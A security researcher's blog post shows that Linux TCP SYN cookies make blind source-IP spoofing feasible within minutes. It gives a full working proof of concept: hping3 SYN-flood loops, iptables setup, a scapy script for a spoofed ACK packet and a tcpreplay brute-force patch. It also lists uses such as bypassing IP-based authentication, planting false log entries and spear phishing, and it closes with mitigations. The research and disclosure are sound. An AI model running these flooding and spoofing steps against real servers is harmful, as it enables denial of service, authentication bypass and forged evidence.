Quick Blind TCP Connection Spoofing with SYN Cookies

Abstract

TCP uses 32 bit Seq/Ack numbers in order to make sure that both sides of a connection can actually receive packets from each other. Additionally, these numbers make it relatively hard to spoof the source address because successful spoofing requires guessing the correct initial sequence number (ISN) which is generated by the server in a non-guessable way. It is commonly known that a 32 bit number can be brute forced in a couple of hours given a fast (gigabit) network connection. This article shows that the effort required for guessing a valid ISN can be reduced from hours to minutes if the server uses TCP SYN Cookies (a widely used defense mechanism against SYN-Flooding DOS Attacks), which are enabled by default for various Linux distributions including Ubuntu and Debian.

I. Repetition of TCP Basics

A TCP Connection is initiated with a three-way handshake:

SYN: The Client sends a SYN packet to the server in order to initiate a connection. The SYN packet contains an initial sequence number (ISN) generated by the client.
SYN-ACK: The server acknowledges the connection request by the client. The SYN-ACK Packet contains an ISN generated by the server. It also confirms the ISN from the client in the ack field of the TCP header so that the client can verify that the SYN-ACK packet actually comes from the server and isn't spoofed.
ACK: In the final ACK packet of the three-way handshake the client confirms that it has received the ISN generated by the server. That way the server knows that the client has actually received the SYN-ACK packet from the server and thus the connection request isn't spoofed.

After this three-way handshake, the TCP connection is established and both sides can send data to each other. The initial sequence numbers make sure that the other side can actually receive the packets and thus prevent IP spoofing given that the attacker can't receive packets sent to the spoofed IP address.

Since the initial sequence numbers are only 32-bit values, it is not impossible to blindly spoof a connection by brute-forcing the ISN. If we need to send 3 packets to the server (one SYN packet to initiate the connection, one ACK packet to finish the three-way handshake and one payload packet), we will have to send 3*2^32 packets per successfully spoofed connection at an average. Given a packet rate of 300,000 packets per second (which can easily be achieved with a gigabit connection), sending this packets requires some 12 hours.

One long-known weakness of the original TCP protocol design is that an attacker can spoof a high number of SYN packets to a server. The server then has to send (and maybe even retransmit) a SYN-ACK packet to each of the spoofed IP addresses and keep track the half-open connection so that it can handle an ACK packet. Remembering a high number of bogus half-open connections can lead to resource exhaustion and make the server unresponsive to legitimate clients. This attack is called SYN Flooding and it can lead to DOS even if the attacker only uses a fraction of the network bandwidth available to the server.

II. Description of the SYN Cookie approach

In order to protect servers against SYN-Flooding attacks, Daniel J. Bernstein suggested the technique of TCP Syn Cookies in 1996. The main idea of the approach is not to keep track of incoming SYN packets and instead encode the required information in the ISN generated by the server. Once the server receives an ACK packet, he can check whether the Ack number from the client actually matches the server-generated ISN, which can easily be recalculated when receiving the ACK-packet. This allows processing the ACK packet without remembering anything about the initial SYN request issued by the client.

Since the server doesn't keep track of half-open connections, it can't remember any detail of the SYN packet sent by the client. Since the initial SYN packet contains the maximum segment size (MSS) of the client, the server encodes the MSS using 3 bits (via a table with 8 hard-coded MSS values). In order to make sure that half-open connections expire after a certain time, the server also encodes a slowly-incrementing (typically about once a minute) counter to the ISN. Other options of the initial SYN packet are typically ignored (although recent Linux kernels do support some options by encoding them via TCP Timestamps [1]). When receiving an ACK packet, the kernel extracts the counter value from the SYN Cookie and checks whether it is one of the last 4 valid values.

The original approach of Bernstein [2] only encodes the counter and the MSS value in the first 8 bits of the ISN thus leaving only 24 bits for the cryptographically generated (non-guessable) value which needs to be guessed for spoofing a connection. This can easily be brute forced within relatively short time given the speed of modern network hardware. In order to mitigate this attack, Bernstein suggests [3]:

# Add another number to the cookie: a 32-bit server-selected secret function of the client address and server address (but not the current time). This forces the attacker to guess 32 bits instead of 24.

This is implemented in recent Linux kernels and it does indeed make guessing the ISN more costly than a simple implementation without this additional secret function. However, as we will see in the next section, it does not require the attacker to guess the full 32 bit ISN.

The following function shows the generation of the SYN Cookies in the Linux Kernel 3.10.1 (file net/ipv4/syncookies.c):

#define COOKIEBITS 24	/* Upper bits store count */
#define COOKIEMASK (((__u32)1 &lt;&lt; COOKIEBITS) - 1)
 
static __u32 secure_tcp_syn_cookie(__be32 saddr, __be32 daddr, __be16 sport,
				   __be16 dport, __u32 sseq, __u32 count,
				   __u32 data)
{
	/*
	 * Compute the secure sequence number.
	 * The output should be:
	 *   HASH(sec1,saddr,sport,daddr,dport,sec1) + sseq + (count * 2^24)
	 *      + (HASH(sec2,saddr,sport,daddr,dport,count,sec2) % 2^24).
	 * Where sseq is their sequence number and count increases every
	 * minute by 1.
	 * As an extra hack, we add a small "data" value that encodes the
	 * MSS into the second hash value.
	 */
 
	return (cookie_hash(saddr, daddr, sport, dport, 0, 0) +
		sseq + (count &lt;&lt; COOKIEBITS) +
		((cookie_hash(saddr, daddr, sport, dport, count, 1) + data)
		 &amp; COOKIEMASK));
}

The value sseq is the sequence number generated by the client and is therefore directly known to the attacker. The data is an integer between 0 and 7, which encodes one of 8 possible MSS values. The count value is just a timestamp which is increased once a minute and it is encoded in the upper 8 bits of the generated cookie. However, since the first hash value is not known to the attacker, the timestamp value must be guessed by the attacker as well.

The following two functions show how the SYN Cookies are verified when receiving an ACK packet:

#define COUNTER_TRIES 4
 
/*
 * This retrieves the small "data" value from the syncookie.
 * If the syncookie is bad, the data returned will be out of
 * range.  This must be checked by the caller.
 *
 * The count value used to generate the cookie must be within
 * "maxdiff" if the current (passed-in) "count".  The return value
 * is (__u32)-1 if this test fails.
 */
static __u32 check_tcp_syn_cookie(__u32 cookie, __be32 saddr, __be32 daddr,
				  __be16 sport, __be16 dport, __u32 sseq,
				  __u32 count, __u32 maxdiff)
{
	__u32 diff;
 
	/* Strip away the layers from the cookie */
	cookie -= cookie_hash(saddr, daddr, sport, dport, 0, 0) + sseq;
 
	/* Cookie is now reduced to (count * 2^24) ^ (hash % 2^24) */
	diff = (count - (cookie &gt;&gt; COOKIEBITS)) &amp; ((__u32) - 1 &gt;&gt; COOKIEBITS);
	if (diff &gt;= maxdiff)
		return (__u32)-1;
 
	return (cookie -
		cookie_hash(saddr, daddr, sport, dport, count - diff, 1))
		&amp; COOKIEMASK;	/* Leaving the data behind */
}
 
/*
 * Check if a ack sequence number is a valid syncookie.
 * Return the decoded mss if it is, or 0 if not.
 */
static inline int cookie_check(struct sk_buff *skb, __u32 cookie)
{
	const struct iphdr *iph = ip_hdr(skb);
	const struct tcphdr *th = tcp_hdr(skb);
	__u32 seq = ntohl(th-&gt;seq) - 1;
	__u32 mssind = check_tcp_syn_cookie(cookie, iph-&gt;saddr, iph-&gt;daddr,
					    th-&gt;source, th-&gt;dest, seq,
					    jiffies / (HZ * 60),
					    COUNTER_TRIES);
 
	return mssind &lt; ARRAY_SIZE(msstab) ? msstab[mssind] : 0;
}

First of all, the server removes the first hash value and the ISN chosen by the client. This is easily possible because the hash only depends on a server secret and the source/destination address/port and doesn't change over time. Then the upper 8 bits contain the count value and if this counter is one of the last four valid counter values, it is accepted. At that point the counter used for generating the SYN Cookie is known and the server can therefore calculate the second hash and subtract it from the cookie. The remaining value is the encoded MSS value. The Cookie is only accepted if this encoded MSS value is actually a number between 0 and 7.

III. Reduced cost of guessing due to multiple valid ISNs

Since the kernel encodes a counter and the MSS value in the ISN, there must be one valid ISN for every combination of a valid counter value and a valid MSS value. In current implementations there are 4 valid counter values and 8 possible MSS values. This gives a total of 32 valid combinations which will be accepted by the server at any given time. Each of this 32 combination results in one valid ISN and if the attacker guesses any one of them, the kernel will accept the ACK packet. This reduces the effort needed to successfully guess a valid ISN by the factor 32.

Since the server doesn't remember that he has received a SYN packet when using SYN Cookies, there is no need to actually send the initial SYN packet. If we start the connection by sending an ACK packet and guess one of the 32 valid ISNs, the kernel will process the ACK packet without noticing that he has never received a SYN packet from the client and responded with a SYN-Ack packet.

IV. Combination of ACK-Packet and Payload

Although the TCP standard assumes that the three-way handshake is completed before any data is sent, it is also possible to add data to the final ACK packet of the handshake [4]. This means that guessing an ISN and spoofing a full tcp connection with some payload data (such as an http request) can be reduced to sending out only one single packet. So the average number of packets required per successfully spoofed connection can be reduced to 2^32 / 32 (because the server accepts 32 different ISNs at a time). At a packet rate of 300,000 pps (which can easily be achieved with gigabit ethernet) this amount of packets can be sent out in no more than 8 minutes (compared to the 12 hours calculated in section I).

V. Possible real-life applications of TCP Connection spoofing

Many application developers assume that TCP makes sure that the client IP address is actually correct and can't easily be spoofed. Being able to spoof the source address obviously creates significant problems when using the IP address for authentication e.g. for legacy protocols like RSH. Even if RSH has widely been replaced by more secure alternatives like SSH by now, there are still some applications where the IP address is used for authentication. For instance it is still common to have administrative interfaces which can only be accessed from certain IP addresses. Another widespread usage of IP addresses for authentication is that many web applications bind the session ID to a specific IP address. If the session ID can be stolen by other means, an attacker can use the method described here to bypass this IP address verification.

Aside from actually using IP addresses for authenticating requests, it is also quite common to log IP addresses, which may then be used to track down initiators of objectionable requests such as exploits, abusive blog comments or illegal file sharing traffic. Using the technique described here may allow planting false evidence in the logged IP addresses.

Being able to spoof IP addresses also allows bypassing SPF e.g. when sending spear phishing mails in order to give the phishing mails the additional credibility of a valid SPF sender address, which may help to bypass email filtering software.

An obvious limitation of the technique described here is that when spoofing the IP address, you can only send a request (which may result in persistent changes on the server) but not receive any responses sent by the server. For many protocols it is however possible to guess the size of the server responses, send matching ACK packets and transmit multiple payload packets in order to spoof a more complex protocol interaction with the server.

VI. POC Exploit and real-life performance measures

This section describes the steps needed to actually carry out the attack and contains full POC code. For my experimental setup the server used the IP address 192.168.1.11 and port 1234. The attacker system was located in the same local subnet and the spoofed IP address was 192.168.1.217.

First of all, even if SYN Cookies are enabled in /proc/sys/net/ipv4/tcp_syncookies (which is the default for various linux distributions), the system will still use a traditional backlog queue for storing half-open connections and only fall back to using SYN Cookies if the backlog queue overflows. The main reason for this is that storing information about connection requests allows full support of TCP Options and arbitrary MSS values (which don't have to be reduced to one of 8 predefined values). The backlog queue size is 2048 by default and can be adjusted via /proc/sys/net/ipv4/tcp_max_syn_backlog. So in order to actually carry out the spoofing attack, we have to intentionally overflow the backlog queue by doing a Syn-Flooding attack. This can be done e.g. with the hping3 command:

hping3 -i u100 -p 1234 -S -a 192.168.1.216 -q 192.168.1.11

Experiments have shown that running hping3 in parallel to the actual ISN brute-forcing does significantly reduce the packet rate even if hping3 is configured to use only a small fraction of the packet rate of the ISN brute-forcing tool. In order to achieve the maximum packet rate possible, it is therefore more efficient to run hping3 in regular short intervals. The following command sends out 3000 SYN packets in a short burst once a second:

while true;do time hping3 -i u1 -c 3000 -S -q -p 1234 -a 192.168.1.216 192.168.1.11;sleep 1;done

The source IP address used for this SYN-Flooding attack should not respond with a RST packet or return an ICMP Destination Host Unreachable message so that the queue entries aren't freed before they time out. On linux you can easily add another IP address to a network interface and block all traffic coming to this IP address in order to prevent it from responding with RST packets:

ifconfig eth0:1 inet 192.168.1.216 netmask 255.255.255.0 up
iptables -I INPUT --dst 192.168.1.216 -j DROP

I've used the same commands to set up the IP address 192.168.1.217, which is the IP address I wanted to spoof. This makes sure that sending responses to the spoofed address won't lead to a RST packet or an ICMP Destination Host Unreachable packet, which may lead to a premature termination of the connection and the processing of the spoofed request in the server software.

ifconfig eth0:2 inet 192.168.1.217 netmask 255.255.255.0 up
iptables -I INPUT --dst 192.168.1.217 -j DROP

In a real world attack, the same goal can also be achieved by issuing a (D)DOS attack against the spoofed IP address.

Once the system is in SYN-Cookie mode, it is necessary to spoof a high number of ACK packets with a payload in order to guess one of the 32 valid ISNs. I initially wanted to do this with scapy but this failed due to the utterly low performance of scapy (less then 10k packets per second). So I went on to create a pcap file in scapy, which can then be sent out with a patched version of tcpreplay in a loop. The patched tcpreplay just increases the ack field of the tcp header by 31337 for each repetition of the loop. Using an uneven number makes sure that it reaches all 2^32 possible values without repetitions. In theory you could just linearly try all possible ISNs. However, the counter value in the 8 upper bits of the ISN only changes once a minute and is linearly incremented for a given combination of source and destination address/port. Therefore a linear search will likely be in an incorrect range and not create any hit within a long time. So it is advisable to increment the guessed ISN by a larger number so that it traverses the full ISN space relatively quickly.

The following python script creates a single ACK packet with some payload data and writes the packet to a pcap file:

#!/usr/bin/python
 
# Change log level to suppress annoying IPv6 error
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
 
from scapy.all import *
import time
 
# Adjust MAC addresses of sender and recipient of this packet accordingly, the dst MAC 
# should be the MAC of the gateway to use when the target is not on your local subnet
ether=Ether(src="40:eb:60:9f:42:a0",dst="e8:40:f2:d1:b3:a2")
# Set up source and destination IP addresses
ip=IP(src="192.168.1.217", dst="192.168.1.11")
 
# Assemble an ACK packet with "Hello World\n" as a payload
pkt = ether/ip/TCP(sport=31337, dport=1234, flags="A", seq=43, ack=1337) / ("Hello World\n")
# Write the packet to a pcap file, which can then be sent using a patched version of tcpreplay
wrpcap("ack_with_payload.pcap",pkt)

The next step is to patch and compile tcpreplay with the following patch:

diff -u -r tcpreplay-3.4.4/src/send_packets.c tcpreplay-3.4.4.patched/src/send_packets.c
--- tcpreplay-3.4.4/src/send_packets.c	2010-04-05 02:58:02.000000000 +0200
+++ tcpreplay-3.4.4.patched/src/send_packets.c	2013-08-06 10:56:51.757048452 +0200
@@ -81,6 +81,9 @@
 void
 send_packets(pcap_t *pcap, int cache_file_idx)
 {
+    static u_int32_t ack_bruteforce_offset = 1;
+    uint32_t* ack;
+    uint32_t orig_ack;
     struct timeval last = { 0, 0 }, last_print_time = { 0, 0 }, print_delta, now;
     COUNTER packetnum = 0;
     struct pcap_pkthdr pkthdr;
@@ -154,6 +157,9 @@
 #endif
 
 #if defined TCPREPLAY &amp;&amp; defined TCPREPLAY_EDIT
+        ack = (uint32_t*)(pktdata + 14 + 20 + 8);
+        orig_ack = *ack;
+        *ack = htonl(ntohl(*ack) + ack_bruteforce_offset);
         pkthdr_ptr = &amp;pkthdr;
         if (tcpedit_packet(tcpedit, &amp;pkthdr_ptr, &amp;pktdata, sp-&gt;cache_dir) == -1) {
             errx(-1, "Error editing packet #" COUNTER_SPEC ": %s", packetnum, tcpedit_geterr(tcpedit));
@@ -176,7 +182,7 @@
         /* write packet out on network */
         if (sendpacket(sp, pktdata, pktlen) &lt; (int)pktlen)
             warnx("Unable to send packet: %s", sendpacket_geterr(sp));
-
+        *ack = orig_ack;
         /*
          * track the time of the "last packet sent".  Again, because of OpenBSD
          * we have to do a mempcy rather then assignment.
@@ -205,7 +211,7 @@
             }
         }
     } /* while */
-
+    ack_bruteforce_offset += 31337;
     if (options.enable_file_cache) {
         options.file_cache[cache_file_idx].cached = TRUE;
     }

Here are the commands needed to patch and compile it on an Ubuntu 12.04 amd64 system:

apt-get install build-essential libpcap-dev
ln -s lib/x86_64-linux-gnu /usr/lib64 # Quick workaround for a bug in the build system of tcpreplay
wget -O tcpreplay-3.4.4.tar.gz http://prdownloads.sourceforge.net/tcpreplay/tcpreplay-3.4.4.tar.gz?download
tar xzvf tcpreplay-3.4.4.tar.gz
cd tcpreplay-3.4.4
cat ../tcpreplay_patch.txt | patch -p1
./configure
make
cp src/tcpreplay-edit ../

After compiling a patched version of tcpreplay, you can use the following commands to actually send out packets in an infinite loop:

python create_packet.py
while true;do time ./tcpreplay-edit -i eth0 -t -C -K -l 500000000 -q ack_with_payload.pcap;done

VII. Experimental results

I've tested this setup in a local network between a 3 year old notebook (HP 6440b, i5-430M CPU and Marvell 88E8072 gigabit NIC) as the client and a desktop computer as the server. With a small test payload, the achievable packet rate is some 280,000 packets per seconds, which leads to some 73% CPU usage of the tcpreplay process (18% user and 55% sys in the output of time). According to [5] it may be expected that the packet rate can at least be doubled given a fast system with a decent Intel gigabit network card. Obviously the actual packet rate also depends on the size of the payload data. During a 10.5 hour overnight run I successfully spoofed 64 connections, which is about one successful spoof every 10 minutes. This is a little bit less than the expected value of 79 spoofed connections (once every 8 minutes). There are several possible explanations for this deviation:

The tcpreplay process takes some time to print the statistics in the end. During that time no packets are sent. I've only used the statistics output of tcpreplay for measuring the packet rate and so the measured packet rate may be a little bit off.
When going to the maximum packet rate achievable with your hardware, there may be packet loss (especially if you don't use any kind of congestion control).
Last but not least the spoofing is a statistical process. The standard deviation is approximately the square root of the expected number of spoofed connections and it is not particularly unlikely to be off by one or two standard deviations from the expected value. For this experiment the standard deviation is sqrt(79) = 8.89 and the measured number of spoofed connections was off by 1.68 standard deviations, which is well within the expected statistical variation.

VIII. Possible mitigation options

The simplification of TCP Connection Spoofing described here is an inherent problem of TCP SYN Cookies and so there won't be a simple patch which just solves the issue and makes the Spoofing Attack as hard as it is without SYN Cookies. It is only possible to gradually increase the required effort for successfully spoofing a connection e.g. by only accepting the last two instead of four counter values (which will lead to a 60-120s timeout between the initial SYN and the final ACK packet of the three-way handshake during a SYN Flooding attack) or by disallowing the combination of the final ACK packet with payload data (which will double the number of packets the attacker has to send). However, even with this two mitigation options in place, the spoofing attack is still about an order of magnitude easier with SYN Cookies than it is without SYN Cookies and it would still be very inadvisable to assume that the source IP address of TCP connections can't be spoofed. It may also be possible to use the lower bits of the TCP timestamp option (which is currently used in order to support TCP Options with SYN Cookies) for encoding the MSS and counter values. However, this can only provide effective protection against a spoofing attack if the server refuses clients which don't support TCP timestamps during a SYN Flooding Attack, which will break compatibility with some standard-conform TCP implementations.

It is obviously possible to disable SYN Cookies (and increase the backlog queue size in /proc/sys/net/ipv4/tcp_max_syn_backlog) in order to make the spoofing attack as hard as possible and force an attacker to brute force the full 32 bit ISN space. However, disabling SYN Cookies may require a significant amount of CPU Time and Memory during a SYN Flooding Attack. Moreover, the spoofing is still not impossible even without SYN Cookies and it will likely succeed within a couple of hours with a gigabit ethernet connection.

Given the limitations of the other mitigation options my suggestion is to solve the problem on a higher level and make sure that the security of applications doesn't rely on the impossible of spoofing the source address of TCP connections. This obviously means that you should never rely on source IP addresses for authentication. For web applications it is also possible to mitigate the issue by using secure CSRF tokens for all actions which cause persistent changes on the server and not processing the request unless it uses a valid CSRF token. In that case the IP address of the request using the CSRF token may be spoofed but the IP address to which the token has been sent to can't be spoofed since the attacker will need to receive the CSRF token so that he can use it. When logging IP addresses used for certain actions such as blog comments or account registrations, the IP address to which the CSRF token has been sent to should be logged additionally to (or instead of) the IP address using the token.

References:
[1]: http://lwn.net/Articles/277146/
[2]: http://cr.yp.to/syncookies.html Section "What are SYN cookies?"
[3]: http://cr.yp.to/syncookies.html Section "Blind connection forgery"
[4]: http://www.thice.nl/creating-ack-get-packets-with-scapy/
[5]: http://wiki.networksecuritytoolkit.org/nstwiki/index.php/LAN_Ethernet_Maximum_Rates,_Generation,_Capturing_%26_Monitoring#pktgen:_UDP_60_Byte_Packets

Jakob Lell's Blog

technology changes – insecurity remains